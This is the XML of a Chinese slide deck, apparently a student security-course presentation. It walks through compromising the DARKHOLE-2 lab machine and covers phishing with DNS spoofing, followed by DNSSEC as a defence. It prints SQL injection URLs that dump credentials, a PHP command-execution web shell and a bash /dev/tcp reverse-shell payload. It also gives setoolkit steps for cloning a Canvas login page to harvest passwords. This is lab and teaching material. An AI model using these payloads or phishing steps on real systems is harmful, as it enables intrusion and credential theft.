            <a:ext cx="824865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wget&amp;git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之后克隆得一个git库webapp，在其中做git操作：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 clone . webapp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查看git log，可以看到之前的commits，看到之前的commit有一次加入了“default credentials”，因此切到之前的commit查看：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72360" y="2767965"/>
            <a:ext cx="6528435" cy="37693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wget&amp;git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 checkout a4d9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 login.php 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于是可以看到ID为1的用户，用此用户可以登录这个webapp。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7060" y="2958465"/>
            <a:ext cx="11177905" cy="2910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wget&amp;git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 checkout a4d9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 login.php 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于是可以看到ID为1的用户，用此用户可以登录这个webapp。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7060" y="2958465"/>
            <a:ext cx="11177905" cy="2910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GitTools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上面这个获取用户的步骤也可以利用GitTools来解决。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克隆GitTools后，可以使用其中的gitdumper来获取`.git`，之后再用extractor获取所有的commits：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/GitTools/Dumper/gitdumper.sh http://192.168.186.147/.git/ gitdump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/GitTools/Extractor/extractor.sh . .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如此也能得到我们需要的commit并获取到用户信息。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SQL 注入获取用户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在dashboard的url中可以看到一个GET参数“id”，改变这个id值，页面也随之变化。把id改为“NULL”，可以发现页面变成了空的。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接下来利用UNION query来提取信息：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在请求中利用ORDER BY可以测出有多少栏要填，依次尝试后，我发现url为192.168.186.147/dashboard.php?id=1' ORDER BY 7 -- -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时开始出现错误，因此一共六栏。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SQL 注入获取用户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继续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用UNION query来提取信息：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url设为`192.168.186.147/dashboard.php?id=NULL' UNION ALL SELECT 1,2,3,4,5,6 -- - `，在页面上就可以看到2，3，5，6分别是Full name，Email，Contact numer，Address四个我们能看到的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58005" y="3272790"/>
            <a:ext cx="3112770" cy="33674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SQL 注入获取用户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利用url`192.168.186.147/dashboard.php?id=NULL' UNION ALL SELECT 1,GROUP_CONCAT(schema_name),3,4,5,6 FROM information_schema.schemata -- -`，得到database一共有`‘mysql,information_schema,performansce_shcema,sys,darkhole_2’`，其中darkhole_2是我们要的。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5070" y="3721418"/>
            <a:ext cx="6667500" cy="1819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SQL 注入获取用户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于是再用url`192.168.186.147/dashboard.php?id=NULL' UNION ALL SELECT 1,GROUP_CONCAT(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema='darkhole_2'-- -`，得到table有`‘ssh,users’`。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88510" y="2844800"/>
            <a:ext cx="2552700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SQL 注入获取用户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接着用url`192.168.186.147/dashboard.php?id=NULL' UNION ALL SELECT 1,GROUP_CONCAT(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name='ssh'-- -`得到`‘id,pass,user’`三项。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92245" y="3097530"/>
            <a:ext cx="3590925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90926" y="3698956"/>
            <a:ext cx="1743242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F4D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9600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9600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F4D7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itre 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574085" y="4404475"/>
            <a:ext cx="6055690" cy="6642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sz="4800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1F4D78"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>钓鱼网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1F4D78"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&amp;DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1F4D78"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>劫持</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F4D78"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Espace réservé du texte 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574085" y="5403748"/>
            <a:ext cx="8160715" cy="64579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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="fr-FR" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" normalizeH="0" dirty="0">
                <a:ln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5"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="27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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="zh-C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SQL 注入获取用户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最终`192.168.186.147/dashboard.php?id=NULL' UNION ALL SELECT 1,user,pass,4,5,6 FROM ssh-- -`，把password和username给dump出来，获得用户`jehad`及其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密码。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获取的用户名与密码在之后用于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ssh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提权获取root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利用之前获得的用户，可以查看靶机的更多内容。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cat /etc/crontab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就可以看到cronjob正在用户losy下运行，端口为9999。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提权获取root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查看对应的php文件：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&lt;?php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echo "Parameter GET['cmd']";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if(isset($_GET['cmd'])){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echo system($_GET['cmd']);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}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?&gt;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可以看到这里可以远程执行命令。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提权获取root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于是利用ssh登录刚才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注入获取的用户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jehad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ssh -L 9999:127.0.0.1:9999 jehad@192.168.186.147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接下来获取一个反弹shell。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提权获取root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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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端口准备接收</a:t>
            </a:r>
            <a:r>
              <a:rPr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nc -nlvp 9001</a:t>
            </a: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用如下payload获取反弹shell</a:t>
            </a:r>
            <a:r>
              <a:rPr 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bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.186.138/9001 0&gt;&amp;1'</a:t>
            </a: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bash</a:t>
            </a:r>
            <a:r>
              <a:rPr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%20c%20%27bash%20i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.186.138%2F9001%200%3E%261%27</a:t>
            </a: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于是我获取了losy用户下的shell。</a:t>
            </a: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提权获取root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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接下来进一步获取root权限：查看.bash_history文件，可以找到losy的密码，并且losy可以直接进行sudo。因此利用我们使用过多次的python就可以得到root权限。</a:t>
            </a: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sudo python3 -c 'import os; os.system("/bin/bash")'</a:t>
            </a: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217" y="337934"/>
            <a:ext cx="11043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Setoolkit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克隆目标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图片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1260" y="4445"/>
            <a:ext cx="2110740" cy="2110740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本占位符 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790575" y="144399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使用kali中的setoolkit工具，依次选择 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1）社会工程学攻击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Social-Engineering Attack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2）网站攻击模块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Website-Attack Vectors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3）凭证收集攻击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Credential Harvester Attack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2）网站克隆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Site Cloner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设置用于钓鱼的IP地址，即为kali主机的地址，再选择要克隆的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网站，我这里选择了canvas登陆界面。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Setoolkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>克隆目标网站</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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此时在windows主机访问钓鱼网站所在ip，可以看到克隆好的网站，在钓鱼网站里输入用户名和密码，点击登录，在setoolkit处可以看到获得的信息。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66950" y="2312670"/>
            <a:ext cx="7459345" cy="40170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DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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在这个钓鱼服务打开时，利用DNS欺骗，就可以让目标在访问正常的canvas登录网址时访问到这个钓鱼网站。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首先在kali上伪造DNS解析记录，之后通过ettercap将伪造的记录发给客户机，此时客户机输入正常的网址就会进入我们克隆好的钓鱼网站，输入用户名密码，点击登录，可以看到kali成功获取了输入的信息。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DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗的防范方法：DNSSEC协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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DNSSEC通过向现有DNS记录添加加密签名的方式来建立一种更安全的DNS。这个签名会与常见的记录类型（如AAAA和MX记录）一起存储在DNS名称服务器中。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随后只需检查所请求的DNS记录对应的签名，即可验证该记录是否直接来自权威名称服务器。这意味着DNS记录在数字化传输过程中不会被投毒或以其他方式篡改，因而可有效防止引入伪造的记录。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DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗的防范</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法：DNSSEC协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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为了向域名集成DNSSEC，首先需要将DNS记录按照名称和类型分组为资源记录集（Resource record set，RRSet）。DNS本身已被分割为DNS区域（Zone），区域是DNS完整命名空间的一部分，可由DNS所有者所在的组织或网络管理员进行监管。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这种区域还可用于对DNS组件进行深入维护，例如权威名称服务器。每个区域都会使用一组名为区域签名密钥（Zone signing key，ZSK）的公钥和私钥对进行签名。由此产生的签名结果会以RRSIG记录的形式发布到区域文件中。通过将DNS区域相互隔离，就算一个区域被攻击者感染，周边区域依然可以获得充分保护。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DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗的防范</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法：DNSSEC协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412750" y="1169670"/>
            <a:ext cx="11168062" cy="48806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虽然DNSSEC是提高网络安全性的一种好方法，但它也可能在无意中引入关键漏洞。DNSSEC可能增加分布式拒绝服务（DDoS）攻击的风险并扩大其影响，导致服务器、服务或网络被来自多个设备的流量同时破坏。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DNSSEC还导致DNS查询响应数量增加，因为该技术需要额外的字段和加密信息来验证记录，这意味着恶意攻击者可以借助大批量响应，针对区域发起远大于DNSSEC实施之前的攻击流量。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KSO_WPP_MARK_KEY" val="e3be3ced-29c4-43e6-b85e-a1ac2c7f2c43"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMWMwOTIwOTA4OTIxMzE2MWE1OGM5YzBiZmU5YmVmNWQifQ=="/>
  <p:tag name="commondata" val="eyJoZGlkIjoiZTc1OWZhMjliZGI3NTkxZjU0NmE3MzUzNzFkNDU0YTM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98000">
              <a:schemeClr val="accent1">
                <a:lumMod val="5000"/>
                <a:lumOff val="95000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="3000">
              <a:srgbClr val="FF7C05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5115</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>259</Paragraphs>
  <Slides>35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Arial Unicode MS</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>1_Office 主题​​</vt:lpstr>
      <vt:lpstr>2_Office 主题​​</vt:lpstr>
      <vt:lpstr>自定义设计方案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Setoolkit克隆目标网站</vt:lpstr>
      <vt:lpstr>DNS欺骗</vt:lpstr>
      <vt:lpstr>DNS欺骗的防范方法：DNSSEC协议</vt:lpstr>
      <vt:lpstr>DNS欺骗的防范方法：DNSSEC协议</vt:lpstr>
      <vt:lpstr>DNS欺骗的防范方法：DNSSEC协议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DARKHOLE-2</vt:lpstr>
      <vt:lpstr>DARKHOLE-2</vt:lpstr>
      <vt:lpstr>wget&amp;git</vt:lpstr>
      <vt:lpstr>wget&amp;git</vt:lpstr>
      <vt:lpstr>wget&amp;git</vt:lpstr>
      <vt:lpstr>wget&amp;git</vt:lpstr>
      <vt:lpstr>GitTools</vt:lpstr>
      <vt:lpstr> SQL 注入获取用户</vt:lpstr>
      <vt:lpstr> SQL 注入获取用户</vt:lpstr>
      <vt:lpstr> SQL 注入获取用户</vt:lpstr>
      <vt:lpstr> SQL 注入获取用户</vt:lpstr>
      <vt:lpstr> SQL 注入获取用户</vt:lpstr>
      <vt:lpstr> SQL 注入获取用户</vt:lpstr>
      <vt:lpstr>提权获取root</vt:lpstr>
      <vt:lpstr>提权获取root</vt:lpstr>
      <vt:lpstr>提权获取root</vt:lpstr>
      <vt:lpstr>提权获取root</vt:lpstr>
      <vt:lpstr>提权获取root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潘冬远、张娉</dc:creator>
  <cp:lastModifiedBy>吴舒文</cp:lastModifiedBy>
  <cp:revision>434</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-23T14:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-12T06:37:20Z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95CAC60A946646268E24C34D9A1D77AA</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.15990</vt:lpwstr>
  </property>
</Properties>
</file>